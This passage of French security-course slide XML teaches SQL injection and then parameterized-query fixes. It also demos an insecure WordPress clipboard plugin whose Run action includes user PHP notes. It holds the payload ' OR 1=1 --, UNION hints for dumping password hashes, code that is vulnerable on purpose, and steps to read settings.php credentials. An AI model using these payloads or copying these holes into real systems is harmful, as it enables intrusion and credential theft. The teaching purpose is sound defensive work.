                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Thrilled to operationalize a zero-trust, micro-segmented, defense-in-depth DMZ fabric as we scale our security posture.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Deux fondateurs. Trois stagiaires non payés. Un post LinkedIn. Le wannabe CTO a encore slingué des keywords.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3099816"/>
            <a:ext cx="73152" cy="2569464"/>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1078992" y="3099816"/>
            <a:ext cx="5989320" cy="2569464"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4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371600" y="3227832"/>
            <a:ext cx="5532120" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Non. Sérieusement.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3557016"/>
            <a:ext cx="5532120" cy="1051560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Un bout de réseau qu’on n’atteint qu’à travers un firewall. Ça isole : données, processing, APIs, le boîtier qui garde les clés. Pas forcément Internet — parfois une DMZ ne parle qu’à une autre DMZ.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21" descr="dilbert-jargon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7406640" y="1554479"/>
            <a:ext cx="3794760" cy="3794760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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01 · intro</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Un champ de recherche, une apostrophe</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L’app concatène ce que vous tapez dans le SQL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Un apostrophe ferme la chaîne trop tôt. Ce n’est plus une valeur. C’est du code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On le montre. Ensuite vous le faites. Le détail du lab : dans le README, sur GitHub.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rounded Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537960" y="1051560"/>
            <a:ext cx="2172614" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FE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720840" y="1371600"/>
            <a:ext cx="1901037" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="DC2626"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CONCATÉNÉ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6720840" y="1783080"/>
            <a:ext cx="1901037" cy="1097280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>WHERE id = {id}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8891625" y="1051560"/>
            <a:ext cx="2172614" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F0F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074505" y="1371600"/>
            <a:ext cx="1901037" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="16A34A"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PARAMÉTRÉ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9074505" y="1783080"/>
            <a:ext cx="1901037" cy="1097280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>WHERE id = ?</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01 · le geste</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La concaténation, rien d’autre</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  ·  Flask</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q = f"SELECT id, email FROM users WHERE email = '{email}'"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cur.execute(q)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># email =  ' OR 1=1 --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Même faille  ·  Express</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db.query("SELECT id, email FROM users WHERE email = '" + email + "'")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>// email =  ' OR 1=1 --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L’apostrophe n’est pas le bug. Le bug, c’est de coller la donnée dans le SQL.</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s1  ·  étape 3</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Condition toujours vraie : ' OR 1=1 --</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Tapez-le à la main. Comparez le SQL final et le nombre d’utilisateurs avec l’étape 1.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1. ' ferme la chaîne.  2. OR 1=1 rend le filtre vrai.  3. -- commente la fin.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="d2s1-or1eq1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1591056"/>
            <a:ext cx="10149840" cy="3669190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="5315110"/>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Résultat attendu : cinq utilisateurs au lieu d’un seul.</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SQL</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Le lab : on l’ouvre ensemble</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day-2  ·  le README dira lequel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="157276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19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1792224"/>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Le geste, vous l’avez vu. Le lab, c’est le même, sur une vraie app.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="204825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Objectif visé : dumper les hashes, rainbow du jour 1, entrer admin.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="230428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Les fichiers : dans le README du lab, sur GitHub. Pas avant.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="261518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Reproduire le geste. Lire ce qui ne devrait pas se lire. Puis on ferme.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rounded Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="339242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005840" y="339242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325880" y="346557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Lancer l’app du jour 2 (README).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rounded Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="388620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05840" y="388620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325880" y="395935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Une apostrophe dans le champ. Lire l’erreur. Pousser jusqu’aux hashes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rounded Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="437997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005840" y="437997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325880" y="445312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Correctif : requête paramétrée. On le fait après, pas avant d’avoir cassé.</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s1.03</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Recherche des enseignants — manipulez, observez</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Commencez par une recherche normale. Regardez comment la saisie devient du SQL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ouvrez db/seed.sql. Voyez les tables. Puis poussez la recherche plus loin que teachers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="d2s1-search-teachers.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3150206" y="1591056"/>
            <a:ext cx="5861107"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UNION, sqlite_master, staff_notes. Les colonnes empruntent les noms du premier SELECT.</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INDICE  ·  Node  ·  pas la page suivante tout de suite</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C’est là. Python : vous le trouverez.</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node-express  ·  buildUnsafeQuery</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function buildUnsafeQuery(email) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  // Deliberately vulnerable: the next lab will replace this concatenation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  return `SELECT id, email FROM users WHERE email = '${email}'`;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="12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Ne passez pas à la page suivante sauf si vous êtes flemmard, si vous avez trouvé, ou si vous êtes vraiment coincé.</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01 · correctif</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Paramétré, Flask et Express</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Flask  ·  sqlite3</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cur.execute(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    "SELECT id, email FROM users WHERE email = ?",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    (email,),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)</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Express  ·  node:sqlite</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db.prepare("SELECT id, email FROM users WHERE email = ?")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  .get(email);</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Le driver reçoit le SQL et les valeurs séparément. Ici : sqlite3 et node:sqlite utilisent ?. %s, c’est psycopg et d’autres drivers Python. Même idée.</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qu’une apostrophe fait à une concaténation</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on ne « enlève pas les quotes »</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écrire une requête paramétrée</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SQL injection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79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qu’une apostrophe fait à une concaténation</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Elle ferme la chaîne. Le reste est du SQL. La base obéit.</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on ne « enlève pas les quotes »</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Il restera toujours une façon de recoller une apostrophe. On n’essaie pas de la filtrer : on envoie la valeur à part.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="334670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45643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47472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écrire une requête paramétrée</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="380390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Le ? est un trou. SQLite y pose la valeur. Une apostrophe reste une apostrophe, pas une instruction.</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80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02</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Easy Clipboard : un plugin gratuit. Donc on l’installe.</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demo live  ·  http://sc8rumo3487.universe.wf/  ·  incinerator</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02 · 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="987552"/>
            <a:ext cx="10058400" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Gratuit n’est pas « revu »</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="170078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1005840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Un plugin WordPress free. Des notes, des fichiers, un petit éditeur. On clique Install.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Personne n’a lu le PHP. C’est dans le webroot. settings.php aussi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On le fait tourner pour de vrai. Pas un slide : le site.</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live</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Ouvrir le clipboard, lire ce qui ne devrait pas se lire</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http://sc8rumo3487.universe.wf/    ·    _servers/incinerator</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Live  ·  sc8rumo3487.universe.wf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1810512"/>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4"/>
              </a:rPr>
              <a:t>Source  ·  _servers/incinerator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2084832"/>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1" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="230428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Un clipboard. CRUD sur des fichiers. txt, html, php, js, dossiers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="2560320"/>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La sidebar liste aussi settings.php. C’est dans le webroot. C’est le plugin.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="2816352"/>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Run = include. Une note .php n’est plus une note.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3127248"/>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Trouver le mot de passe de la base. Faire exécuter une note PHP.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rounded Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3904488"/>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1005840" y="3904488"/>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325880" y="3977640"/>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Ouvrir le site. settings.php : user, password, nom de la base.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rounded Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="439826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439826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447141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clipboard/ping.php → Run. Puis sauver un oops.php qui lit ../settings.php.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rounded Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="489204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1005840" y="489204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325880" y="496519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Ensuite seulement : la page suivante, le correctif.</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Moon SC8</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Ça, c’est en ligne. Du code dangereux.</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Pas sur un serveur qui fait autre chose. Pas sur une machine à vous qui compte. N’importe qui entre, et casse.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ce genre d’app unsafe existe partout sur le web. Il suffit d’un script kiddie. On le montre ici, isolé, exprès.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="d2s2-moon-sc8.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3284522" y="1591056"/>
            <a:ext cx="5592474"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https://sc8rumo3487.universe.wf/  ·  Easy Clipboard free  ·  lab isolé</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02 · le trou</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Save + Run. L’éditeur est un interpréteur.</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index.php  ·  le Run</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if ($action === "run") {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    include clip_path($_GET["name"]);   // la note s'exécute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
